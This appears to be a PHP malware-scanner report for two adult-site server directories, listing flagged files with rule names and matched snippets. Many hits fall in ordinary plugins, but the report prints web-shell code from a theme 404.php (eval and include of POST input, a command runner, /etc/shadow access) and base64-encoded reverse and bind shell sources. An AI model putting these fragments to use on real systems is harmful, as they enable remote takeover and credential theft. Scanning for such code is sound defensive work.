//var/www/pern/data/www/intim-perm.club/script_smartwall/index.php Size: 38.45 kB Created: 2020-09-27 18:25:10 Modified: 2020-09-27 18:25:22 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/pern/data/www/intim-perm.club/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-09-27 18:25:10 Modified: 2020-09-27 18:25:22 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2021-10-02 13:54:28 Modified: 2021-10-02 13:54:28 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2021-10-02 13:54:28 Modified: 2021-10-02 13:54:28 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 2
| Description | Match |
|---|
Exploit execution2 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns);
}
/**
* @return bool
*/
public static function isInlineJsEnabled()
{
$isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] &&
(trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) {
return false;
}
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js
if (array_key_e...
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_POST)
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2021-10-02 13:54:30 Modified: 2021-10-02 13:54:30 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/script_smartwall/update.php Size: 9.06 kB Created: 2021-07-08 10:41:01 Modified: 2021-07-08 13:43:57 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/script_smartwall/index.php Size: 38.45 kB Created: 2021-07-08 10:41:01 Modified: 2021-07-08 13:43:57 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/intimdosugsex/data/www/intim-dosug-sex.ru/script_smartwall/smartwall.php Size: 8.87 kB Created: 2021-07-08 10:41:01 Modified: 2021-07-08 13:43:57 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/intimdosugsex/data/www/themes/sborka_BAD/scripts/slick/fonts/index.php Size: 8.55 kB Created: 2021-06-08 05:54:00 Modified: 2021-06-08 05:54:00 Warns: 2
| Description | Match |
|---|
Exploit infected_comment Line: 112 Warning Comments composed by 5 random chars usually used to detect if a file is infected yet |
/*index*/
| Exploit infected_comment Line: 90 Warning Comments composed by 5 random chars usually used to detect if a file is infected yet |
/*horse*/
|
|
//var/www/intimdosugsex/data/www/themes/sketch/404.php Size: 79.30 kB Created: 2021-06-06 00:59:52 Modified: 2021-06-06 00:59:52 Warns: 10 Dangers: 49
| Description | Match |
|---|
Exploit base64_long Line: 1576 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2F...
| Exploit base64_long Line: 1577 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3R...
| Exploit base64_long Line: 1578 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHR...
| Exploit base64_long Line: 1579 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWR...
| Exploit basedir_bypass Dangerous Basedir bypass used for manipulate files or execute code outside the base directory set on the server configuration |
curl_init("file://".$_POST['p2']."�".SELF_PATH)
| Exploit basedir_bypass Line: 1063 Dangerous Basedir bypass used for manipulate files or execute code outside the base directory set on the server configuration |
curl_init("file://".$_POST['p2']."\x00".SELF_PATH)
| Exploit download_remote_code2 Line: 518 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite($fp,$_POST['p3'])
| Exploit etc_passwd Line: 390 Dangerous The `/etc/passwd` file on Unix systems contains password information, an attacker who has accessed the `etc/passwd` file may attempt a brute force attack of all passwords on the system |
/etc/passwd
| Exploit etc_shadow Line: 391 Dangerous The `/etc/shadow` file on Unix systems contains password information, an attacker who has accessed the `etc/shadow` file may attempt a brute force attack of all passwords on the system |
/etc/shadow
| Exploit execution Line: 1069 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_POST['p2'])
| Exploit execution Line: 350 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval($_POST['p1'])
| Exploit php_uname Line: 184 Dangerous RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine |
php_uname('r')
| Exploit php_uname Line: 185 Dangerous RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine |
php_uname('s')
| Exploit var_as_func Line: 989 Dangerous RCE (Remote Code Execution) and Code Injection, through global vars used as PHP function, allow remote attackers to execute PHP code on the target machine via HTTP request |
$_POST['p1']($_POST['p2'])
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(arr[2].substr(0, arr[1]));
} else alert('Request error!');
}
</script>
<head><body><div style='position:absolute;background-color:rgba(95, 110, 130, 0.3);width:100%;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>"; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_to...
| Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
} else alert('Request error!');
}
</script>
<head><body><div style='position:absolute;background-color:rgba(95, 110, 130, 0.3);width:100%;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>"; $freeSpace = @diskfreespace($GLOBALS['c...
| Function passthru Warning Potentially dangerous function `passthru` [https://www.php.net/passthru] |
passthru($in); $▖ = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $▖ = ob_get_clean(); } elseif (function_exists('shell_exec')) { $▖ = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $▖ = ""; while(!@feof($f)) $▖ .= fread($f,1024); pclose($f); }else return "↳ Unable to execute command\n"; return ($▖==''?"↳ Query did not return anything\n":$▖); } function viewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 107374182...
